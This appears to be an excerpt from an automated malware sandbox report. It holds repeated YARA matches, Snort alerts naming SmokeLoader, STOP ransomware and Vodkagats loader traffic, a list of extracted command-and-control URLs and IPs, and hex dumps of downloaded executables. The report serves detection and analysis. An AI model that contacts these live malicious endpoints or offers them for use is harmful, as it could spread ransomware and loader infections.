                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_00410160
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_0040F730

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: toobussy.com
                Source: C:\Windows\explorer.exeNetwork Connect: 104.21.18.99 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 201.124.31.170 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 80.66.203.53 443Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: colisumy.com
                Source: C:\Windows\explorer.exeDomain query: astoriaresidency.com
                Source: C:\Windows\explorer.exeNetwork Connect: 211.168.53.110 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: potunulit.org
                Source: C:\Windows\explorer.exeNetwork Connect: 187.251.132.139 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 45.9.74.80 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 103.233.24.19 443Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 92.83.236.139 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 190.231.153.132 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.7 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 190.103.205.174 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: shsplatform.co.uk
                Source: TrafficSnort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.4:59683 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.4:61007 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.4:59446 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 181.63.252.68:80 -> 192.168.2.4:49706
                Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49707 -> 190.229.19.7:80
                Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49707 -> 190.229.19.7:80
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Malware configuration extractorURLs: 5.42.65.80/8bmeVwqx/index.php
                Source: Malware configuration extractorURLs: http://zexeq.com/raud/get.php
                Source: Malware configuration extractorURLs: http://otriluyttn.org/
                Source: Malware configuration extractorURLs: http://tolilolihul.net/
                Source: Malware configuration extractorURLs: http://somatoka51hub.net/
                Source: Malware configuration extractorURLs: http://nuljjjnuli.org/
                Source: Malware configuration extractorURLs: http://potunulit.org/
                Source: Malware configuration extractorURLs: http://hutnilior.net/
                Source: Malware configuration extractorURLs: http://bulimu55t.net/
                Source: Malware configuration extractorURLs: http://soryytlic4.net/
                Source: Malware configuration extractorURLs: http://bukubuka1.net/
                Source: Malware configuration extractorURLs: http://novanosa5org.org/
                Source: Malware configuration extractorURLs: http://hujukui3.net/
                Source: Malware configuration extractorURLs: http://newzelannd66.org/
                Source: Malware configuration extractorURLs: http://golilopaster.org/
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199235044780
                Source: Malware configuration extractorURLs: https://t.me/headlist
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 18:23:38 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 21 Jun 2023 18:20:03 GMTETag: "b5400-5fea7d10ad77e"Accept-Ranges: bytesContent-Length: 742400Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8a dd 99 f5 ce bc f7 a6 ce bc f7 a6 ce bc f7 a6 5d f2 6f a6 cf bc f7 a6 a1 ca 69 a6 da bc f7 a6 a1 ca 5d a6 a0 bc f7 a6 a1 ca 5c a6 ec bc f7 a6 c7 c4 64 a6 cb bc f7 a6 ce bc f6 a6 b1 bc f7 a6 a1 ca 58 a6 cf bc f7 a6 a1 ca 6d a6 cf bc f7 a6 a1 ca 6a a6 cf bc f7 a6 52 69 63 68 ce bc f7 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 33 8f f2 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 40 01 00 00 8e 7a 01 00 00 00 00 1f 54 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 7b 01 00 04 00 00 d0 8f 0b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 43 01 00 3c 00 00 00 00 80 7a 01 88 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 36 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8e 3e 01 00 00 10 00 00 00 40 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 1e 79 01 00 50 01 00 00 2a 09 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 6f 6a 75 00 00 00 44 02 00 00 00 70 7a 01 00 04 00 00 00 6e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 e0 00 00 00 80 7a 01 00 e2 00 00 00 72 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 18:23:51 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 21 Jun 2023 18:20:03 GMTETag: "b5400-5fea7d10ad77e"Accept-Ranges: bytesContent-Length: 742400Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8a dd 99 f5 ce bc f7 a6 ce bc f7 a6 ce bc f7 a6 5d f2 6f a6 cf bc f7 a6 a1 ca 69 a6 da bc f7 a6 a1 ca 5d a6 a0 bc f7 a6 a1 ca 5c a6 ec bc f7 a6 c7 c4 64 a6 cb bc f7 a6 ce bc f6 a6 b1 bc f7 a6 a1 ca 58 a6 cf bc f7 a6 a1 ca 6d a6 cf bc f7 a6 a1 ca 6a a6 cf bc f7 a6 52 69 63 68 ce bc f7 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 33 8f f2 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 40 01 00 00 8e 7a 01 00 00 00 00 1f 54 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 7b 01 00 04 00 00 d0 8f 0b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 43 01 00 3c 00 00 00 00 80 7a 01 88 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 36 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8e 3e 01 00 00 10 00 00 00 40 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 1e 79 01 00 50 01 00 00 2a 09 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 6f 6a 75 00 00 00 44 02 00 00 00 70 7a 01 00 04 00 00 00 6e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 e0 00 00 00 80 7a 01 00 e2 00 00 00 72 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 18:23:57 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Mon, 19 Jun 2023 15:40:57 GMTETag: "55200-5fe7d5c5a74eb"Accept-Ranges: bytesContent-Length: 348672Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 65 ad d1 65 21 cc bf 36 21 cc bf 36 21 cc bf 36 b2 82 27 36 20 cc bf 36 4e ba 21 36 35 cc bf 36 4e ba 15 36 4e cc bf 36 4e ba 14 36 03 cc bf 36 28 b4 2c 36 22 cc bf 36 21 cc be 36 5d cc bf 36 4e ba 10 36 20 cc bf 36 4e ba 25 36 20 cc bf 36 4e ba 22 36 20 cc bf 36 52 69 63 68 21 cc bf 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 69 97 04 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 3e 01 00 00 8c 74 01 00 00 00 00 a4 52 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 75 01 00 04 00 00 fc e9 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 42 01 00 28 00 00 00 00 60 74 01 78 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 34 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 be 3c 01 00 00 10 00 00 00 3e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 ef 72 01 00 50 01 00 00 fc 02 00 00 42 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 69 64 61 00 00 00 a8 16 00 00 00 40 74 01 00 18 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 fa 00 00 00 60 74 01 00 fc 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
